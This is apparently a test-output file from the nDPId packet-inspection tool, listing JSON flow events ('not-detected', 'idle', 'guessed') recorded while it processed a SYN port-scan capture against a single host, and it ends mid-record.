-00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":263,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058530,"flow_last_seen":1278275058530,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":40911,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":263,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058530,"flow_last_seen":1278275058530,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":40911,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00651{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1631,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060903,"flow_last_seen":1278275060903,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2000,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"CiscoSkinny","breed":"Acceptable","category":"VoIP"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1631,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060903,"flow_last_seen":1278275060903,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2000,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":833,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059785,"flow_last_seen":1278275059785,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1999,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":833,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059785,"flow_last_seen":1278275059785,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1999,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":316,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058656,"flow_last_seen":1278275058656,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":40911,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":316,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058656,"flow_last_seen":1278275058656,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":40911,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00651{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1710,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061004,"flow_last_seen":1278275061004,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2000,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"CiscoSkinny","breed":"Acceptable","category":"VoIP"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1710,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061004,"flow_last_seen":1278275061004,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2000,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":355,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058780,"flow_last_seen":1278275058780,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2001,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":355,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058780,"flow_last_seen":1278275058780,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2001,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1496,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060699,"flow_last_seen":1278275060699,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2002,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1496,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060699,"flow_last_seen":1278275060699,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2002,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":388,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058905,"flow_last_seen":1278275058905,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2001,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":388,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058905,"flow_last_seen":1278275058905,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2001,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1553,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060800,"flow_last_seen":1278275060800,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2002,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1553,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060800,"flow_last_seen":1278275060800,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2002,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1185,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060291,"flow_last_seen":1278275060291,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2003,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1185,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060291,"flow_last_seen":1278275060291,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2003,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1381,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060591,"flow_last_seen":1278275060591,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":6100,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1381,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060591,"flow_last_seen":1278275060591,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":6100,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1271,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060393,"flow_last_seen":1278275060393,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2003,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1271,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060393,"flow_last_seen":1278275060393,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2003,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":893,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059852,"flow_last_seen":1278275059852,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2004,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":893,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059852,"flow_last_seen":1278275059852,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2004,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1468,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060694,"flow_last_seen":1278275060694,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":6100,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1468,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060694,"flow_last_seen":1278275060694,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":6100,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1035,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060071,"flow_last_seen":1278275060071,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":6101,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1035,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060071,"flow_last_seen":1278275060071,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":6101,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":962,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059961,"flow_last_seen":1278275059961,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2004,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":962,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059961,"flow_last_seen":1278275059961,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2004,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":101,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058030,"flow_last_seen":1278275058030,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2005,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":101,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058030,"flow_last_seen":1278275058030,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2005,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1120,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060182,"flow_last_seen":1278275060182,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":6101,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1120,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060182,"flow_last_seen":1278275060182,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":6101,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1693,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061002,"flow_last_seen":1278275061002,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2006,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1693,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061002,"flow_last_seen":1278275061002,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2006,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":149,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058155,"flow_last_seen":1278275058155,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2005,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":149,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058155,"flow_last_seen":1278275058155,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2005,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1764,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061104,"flow_last_seen":1278275061104,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2006,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1764,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061104,"flow_last_seen":1278275061104,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2006,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1432,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060641,"flow_last_seen":1278275060641,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2007,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1432,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060641,"flow_last_seen":1278275060641,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2007,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1822,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061154,"flow_last_seen":1278275061154,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2008,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1822,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061154,"flow_last_seen":1278275061154,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2008,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1514,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060744,"flow_last_seen":1278275060744,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2007,"l4_proto":"tcp","ndpi": 